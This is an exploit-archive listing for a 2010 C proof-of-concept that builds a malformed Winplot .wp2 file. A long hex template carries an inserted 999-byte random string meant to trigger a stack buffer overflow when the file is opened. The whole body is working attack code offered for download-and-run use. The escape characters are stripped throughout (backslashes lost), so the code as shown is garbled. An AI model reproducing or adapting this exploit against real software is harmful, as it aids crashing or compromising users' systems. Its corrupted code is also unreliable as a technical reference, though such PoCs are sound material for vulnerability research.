[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Winplot 2010 Buffer Overflow PoC
# Published : 2010-06-15
# Author : fl0 fl0w
# Previous Title : ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH archive parsing PoC Exploit
# Next Title : File Sharing Wizard v1.5.0 Buffer Overflow PoC
/*
DISCLAIMER
THIS PROGRAM IS NOT INTENDED TO BE USED ON OTHER COMPUTERS AND IT IS DESTINED FOR PERSONAL RESEARCH ONLY!!!!
The programs are provided as is without any guarantees or warranty.
The author is not responsible for any damage or losses of any kind caused by the use or misuse of the programs.
The author is under no obligation to provide support, service, corrections, or upgrades to the free software programs.
Author: fl0 fl0w
Software: Winplot
Dl link: http://math.exeter.edu/rparris/peanut/wp32z.exe
Afected Versions: compiled 7 june 2010
Remote: No
Local: Yes
Class: Boundary Condition Error
Bug: Stack buffer overflow
Afected software: Windows 95/98/ME/2K/XP/Vista/7
Fix: No fix
Compiler: gcc version 3.4.4 (cygming special, gdc 0.12, using dmd 0.125)
Advice: To avoid any problems under Windows use cygwin console.
The .C code:
*/
#include<stdio.h>
typedef int i32;
typedef char i8;
typedef short i16;
typedef unsigned int ui32;
#define CHARS "0123456789ABCDEFGHIJKLMNOPQRST"
"UVWXYZabcdefghijklmnopqrstuvwxyz"
#define MEM_ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define POC_NAME "pocfile.wp2"
#define TITLE "-Winplot 2010 buffer overflow pocn"
"-by fl0 fl0wn"
"-File builtn"
#define WP2 "x49x03x00x00x24x00x00x00x31x01x00x00x95x00x00x00x80x02x00x00"
"x80x02x00x00x00x00x00x00x01x00x00x00x3dx00x00x00xd9xffxffxff"
"x2cx01x00x00x64x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00"
"x0ax00x00x00x0fx00x00x00x2bxd0x28x01x49x1ex29x01x00x00x00x00"
"x0cx00x00x00x0ax00x00x00x0ax00x00x00x08x00x00x00x0cx00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"xf0xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x02x08x02x01x31x53x79x6dx62x6fx6cx00x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf5xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf0xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x02x54x69x6dx65x73x00x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x02x54x69x6dx65x73x00x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x0cxf2x12x00x5dxddx52x00x08x80x55x00x00x00x00x00x00x0cxf2x12"
"x00x5dxddx52x00x08x80x55x00x00x00x00x00x00x0cxf2x12x00x5dxdd"
"x52x00x08x80x55x00x00x00x00x00x00x0cxf2x12x00x5dxddx52x00x08"
"x80x55x00x00x00x00x00x00x01x00x04x00x06x00x00x00x04x00x06x00"
"x04x00x04x00x00x00x00x00x15x00x04x00x00x00x00x00x00x00x00x00"
"x00x00xffxffxffx00xffx00xffx00xffxffx00x00xffx00x00x00x00xbf"
"x3fx00x00x00xffx00x00x7fx7fx00xffx7fx00x00xffx00x7fx00xa0x2f"
"x00x00x00xffxffx00xbfxbfx7fx00x7fx00x7fx00x20xffx00x00xffx7f"
"x7fx00x87x87x00x00x00x3cxa0x00xe0xe0xe0x00xc0xc0xc0x00xa0xa0"
"xa0x00x80x80x80x00x60x60x60x00x40x40x40x00xbfx00x3fx00x7exde"
"xffx00xffxccxccx00xffx7exdex00xffxdex7ex00xdexffx7ex00x7exff"
"xdex00xffxffxbfx00xffxbfxffx00xbfxffxffx00xffxffxdex00xffxde"
"xffx00xdexffxffx00xb1xdexd4x00xb1xd4xdex00xd4xb1xdex00xd4xde"
"xb1x00xdexb1xd4x00xdexd4xb1x00xbfxf1xdex00xbfxdexf1x00xdexf1"
"xbfx00xdexbfxf1x00xf1xdexbfx00xf1xbfxdex00xffx96xeax00x96xea"
"xffx00xccxccxccx00xc8x70x00x00xdexcdx00x00xdex68x20x00x14x82"
"x28x00xc0x00xa0x00xd4x28x28x00x50x84xb0x00x64xa0xc8x00x14x64"
"x14x00x05x00x7dx00x00x00x01x00x01x00x01x00x0ax00x05x00x02x00"
"xffxffx64x00x03x00x3cx00x07x00x0fx00x01x00x03x00x08x00x0cx00"
"x1ex00x01x00x00x00x00x00x00x00x00x00x00x00x01x00x03x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00"
"x70x00x0cx00x14x00x00x00x00x00x7bx03xffxffx32x00x00x00xb0x00"
"x01x00x00x00x00x00x01x00x00x00xffxffxffxffx00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x01x01x00x00x00x00x01x01x01x00x00x00x00x00"
"x00x01x00x00x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xa0"
"x01x40x00x00x00x00x00x00x00xa0x01xc0x00x00x00x00x00x00x00xa0"
"x01x40x78xb5xb8x09xf3xbbx5ax94x01xc0x78xb5xb8x09xf3xbbx5ax94"
"x01x40x00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00x80"
"xffx3fx00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00xf0x04x40x00x00x00x00x00x00x00xa0"
"x05x40x00x00x00x00x00x00x00xf0x04x40x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x80x00x40x00x00x00x00x00x00x00x80"
"x00x40x00x00x00x00x00x00x00x80x00x40x00x30x33x33x33x33x33xb3"
"xfex3fx00xd0xccxccxccxccxccxccxfbx3fx00x00x00x00x00x00x00xa0"
"x01x40x00x00x00x00x00x00x00x00x00x00x00xa8x5exdfx9bx4fx77xd6"
"xfbx3fx00x48xe1x7ax14xaex47x81xffx3fx00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00xc0"
"xfex3fx7ax00x00x00x00x00xf0xf4x12x00x01x00x00x00x00x00x00x00"
"x80xf6x12x00xd5x4ax40x00x14x03x1cx00xf0xf4x12x00x30x04x54x00"
"xf0x8fx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xa0"
"x01x40x00x00x00x00x00x00x00xfax08x40x00xd0xccxccxccxccxccxcc"
"xfbx3fx00x00x00x00x00x00x40x9cx0cx40x00x00x00x00x00x00x00xc8"
"x07x40x00x00x00x00x00x00x00x96x06x40x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00xa0x01x40x00x00x00x00x00x00x00xfa"
"x08x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xa0"
"x01x40x00x00x00x00x00x00x00xc8x05x40x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00xa0x01x40x00x00x00x00x00x00x00xc8"
"x05x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x80"
"x00x40x00x00x00x00x00x00x00x80x00x40x00x00x00x00x00x00x00x80"
"x00x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00xa0x01x40x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x02x00x78x00x02x00x79x00"
"x02x00x7ax00x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x9bx4axbbxa2x58x54xf8xadx00x40x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x0cx00x00x00x00x00"
"x00x00xf0xf4x12x00x40xf3x12x00x0cx0cx00x00x00x00x00x00x00xf0"
"xf4x12x00x40xf3x12x00x0cx0cx00x00x00x00x00x00x00xf0xf4x12x00"
"x40xf3x12x00x0cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x01"
"x00x00"
struct nums{
i32 RND_STR_OFFSET;
i32 RND_STR_LEN;
i32 FL_SIZE;
i32 CHAR_SIZE;
}NUM;
void gen_random(i8*,const int);
void fl(i8*);
void error_handle(void);
void copy_str(i8*,i8*,i32);
void val_assign(void);
i32 main(){
printf("%s",TITLE);
val_assign();
fl(POC_NAME);
return 0;
}
void gen_random (i8* s, const int len){
i32 i;//follow the string in the stack
for(i=0;i<len;++i){
s[i]=CHARS[rand()%(sizeof(CHARS)-1)];
}
s[len]=0;
}
void fl(i8* Fname){
FILE* file;
i8* BUF;
i8* buff;
buff=MEM_ALOC(i8,NUM.FL_SIZE);
BUF=MEM_ALOC(i8,NUM.RND_STR_LEN);
if(!buff)
error_handle();
if(!BUF)
error_handle();
file = fopen(Fname,"wb");
if(!file)
error_handle();
copy_str(buff,WP2,NUM.FL_SIZE);
gen_random(BUF,NUM.RND_STR_LEN);
copy_str(buff+NUM.RND_STR_OFFSET,BUF,NUM.RND_STR_LEN);
fwrite(buff,NUM.CHAR_SIZE,NUM.FL_SIZE,file);
fclose(file);
free(buff);
}
void val_assign(void){
NUM.FL_SIZE = 3322;
NUM.RND_STR_OFFSET = 1570;
NUM.RND_STR_LEN = 999;
NUM.CHAR_SIZE = 1;
}
void error_handle(void){
perror("nError");
exit(1);
}
void copy_str(i8* v,i8* w,i32 len){
memcpy(v, w, len);
}